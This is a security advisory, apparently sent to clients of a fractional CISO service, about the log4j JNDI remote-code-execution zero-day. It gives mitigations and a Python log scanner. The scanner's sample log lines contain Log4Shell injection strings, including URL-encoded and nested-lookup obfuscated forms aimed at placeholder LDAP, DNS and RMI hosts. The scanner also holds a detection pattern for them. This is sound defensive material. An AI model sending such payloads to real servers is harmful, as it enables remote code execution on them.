We sent the following notice to all Fractional CISO clients yesterday.
We are sending this notice to all Fractional CISO clients to inform them about an extremely critical zero-day vulnerability that requires immediate attention – right now, not on Monday. This vulnerability is pervasive, Internet-facing, and easily exploitable by anybody with limited hacking experience.
What’s happening:
A vulnerability was announced recently that affects the popular Java logging library “log4j”. This vulnerability is extremely serious because even trivial exploits can lead to complete compromise of the affected systems.
Are you vulnerable?
Assume you are vulnerable until you confirm you are not. Further, if you have a vulnerable system, it may already have been exploited. Specifically, anyone using Java server or Java client applications with log4j from versions 2.0 (released in 2014) to 2.15 (released this week) is vulnerable. Log4j is used in almost all Java applications – if you write Java code or use Java applications, you are almost certainly vulnerable.
What you need to do:
Survey your environment for Java applications, both code you create and third-party applications.
Option 1: Upgrade log4j to version 2.15.0.
Option 2: If you are using log4j 2.10.0 to 2.14.1, configure log4j with “formatMsgNoLookups=true”.
Option 3: If you are using a version older than 2.10.0 and cannot upgrade, change every logging pattern layout in your logging config files to use %m{nolookups} instead of %m.
More information: https://www.lunasec.io/docs/blog/log4j-zero-day/
How does the vulnerability work?
Log4j is used to configure logging in applications, for example webserver access logs, which often contain data submitted by the user’s browser, such as the requested URL or the User-Agent HTTP header. The vulnerability relates to how log4j processes user-supplied data that may contain “JNDI” variable references. Using these variable references, attackers are able to trick log4j into executing code on vulnerable systems (remote code execution).
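As an added example (not part of the original notice), the following Python scans access log lines for the JNDI lookup pattern described above, after undoing URL encoding and the simple nested-lookup forms log4j resolves before the outer lookup. The log lines, addresses and hostnames are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample web-server access log lines (made up for this example;
# 203.0.113.0/24 and .invalid are reserved documentation values).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:14:02:15 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://example.invalid/a}"
203.0.113.9 - - [10/Dec/2021:14:02:19 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fexample.invalid%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"
203.0.113.11 - - [10/Dec/2021:14:02:23 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:rmi://example.invalid/x}"
"""

# Nested lookups that log4j resolves before the outer one: ${lower:X}, ${upper:X}
# and the default-value form ${something:-X} (e.g. ${::-X}) all evaluate to X.
_NESTED = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}", re.I)
# The marker we ultimately look for once the string has been unwrapped.
JNDI_MARK = re.compile(r"\$\{\s*jndi\s*:", re.I)


def normalize(text: str, rounds: int = 5) -> str:
    """Undo URL encoding and collapse simple nested lookups, bounded to `rounds` passes."""
    for _ in range(rounds):
        new = unquote(text)
        new = _NESTED.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), new)
        if new == text:
            break
        text = new
    return text


def scan_log(log_text: str) -> list:
    """Return one record per log line that contains a JNDI lookup after normalization."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        norm = normalize(line)
        match = JNDI_MARK.search(norm)
        if match:
            hits.append({"line": lineno, "evidence": norm[match.start():match.start() + 60]})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['evidence']}")
```

A hit means the request reached a logger and should be treated as a potential exploitation attempt against any log4j-backed application that logged it, not just as noise.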
Going forward, it is going to be critical to block this traffic before it reaches Java applications. Vendors are probably working on this tooling now – be on the lookout for messages and updates.
More Information: https://www.pcmag.com/news/countless-serves-are-vulnerable-to-apache-log4j-zero-day-exploit